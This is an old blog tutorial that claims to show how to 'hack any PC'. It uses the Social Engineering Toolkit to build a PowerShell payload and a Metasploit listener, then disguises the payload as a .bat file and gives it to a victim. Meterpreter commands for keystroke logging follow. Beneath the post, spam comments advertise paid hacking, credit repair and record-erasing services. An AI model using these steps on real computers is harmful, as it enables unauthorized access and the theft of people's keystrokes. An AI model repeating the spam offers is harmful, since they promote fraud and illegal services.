Saturday 28 May 2016

Hack Any PC Using Kali-Linux


Isn't it cool that you can control other's pc from your pc!!! Yes you can do it very easily. All you need is Kali linux in your PC..

In this tutorial you will learn HOW TO HACK ANY PC USING KALI LINUX. 
We are going to use SOCIAL ENGINEERING TOOLKIT for the hacking purpose. You may be curious about What the hell is social engineering toolkit? Let's first start with what is SET?

SOCIAL ENGINEERING TOOLKIT

SET is basically an open source python driven tool aimed at penetration testing around social engineering. It was created by the founder of TrustedSec. It is a menu driven based attack system, which makes the use of hacker tools easy. It is not made with command line interface because the social engineering attacks requires lot of customization according to the scenarios. Let's dive into the SET menu.

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules
  99) Return back to the main menu  

It has got 12 options . And each option has got sub- divisions . We will not makes our hands dirty in all this .We will mainly focus on our main aim i.e hack any pc

So let's get started !!!!

Follow These Simple Steps :


1. Fire up Kali linux 2.0 / Kali linux 1.0 

2. Go to Applications>Exploitation Tools>Social Engineering Toolkit.

3. Select 1(Social Engineering Attacks) ==> 9(Powershell Attack Vectors ) ==> 1(Powershell Alphanumeric Shellcode Injectors).

4. Open a new terminal and type ifconfig .Copy and paste the ip address after LHOST : 192.XXX.X.XX and enter PORT:443






5. Do you want to start the listner now [yes/no] : yes . Copy the path as shown





6. Open a new terminal and Type the commands as shown


7. The file named as x86 powershellinjection.txt will be saved on your kali linux desktop rename it as "YOURNAME.bat ". Transfer it using pen drive or any cloud drive to victims pc.

8. When the victim press the .bat file on his pc , the payload handler will start .






9. msf exploit (handler) > sessions -i 1
    meterpreter>sysinfo
    meterpreter>keyscan_start (whatever the victim will type the keys will be recorded)

    meterpreter>keyscan_dump

     meterpreter>help (To get hacking/exploit commands list)

NOTE: This hacking only works when both the pc(your pc and victim's pc) is connected on the same network(LAN/WiFi). And we don't take any responsibility in case of breaking any legal laws. This tutorial is for educational purpose only.

If you like this tutorial please LIKE & SHARE this with your friends !!!! 

For any queries comment below..

Enjoy !!! :)

2 comments:

  1. The vast majority of the dark web guide . site are trick so we tried this site cash365
    live to test in the event that it is genuine or not.

    ReplyDelete
  2. This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change
    -funds recovery

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete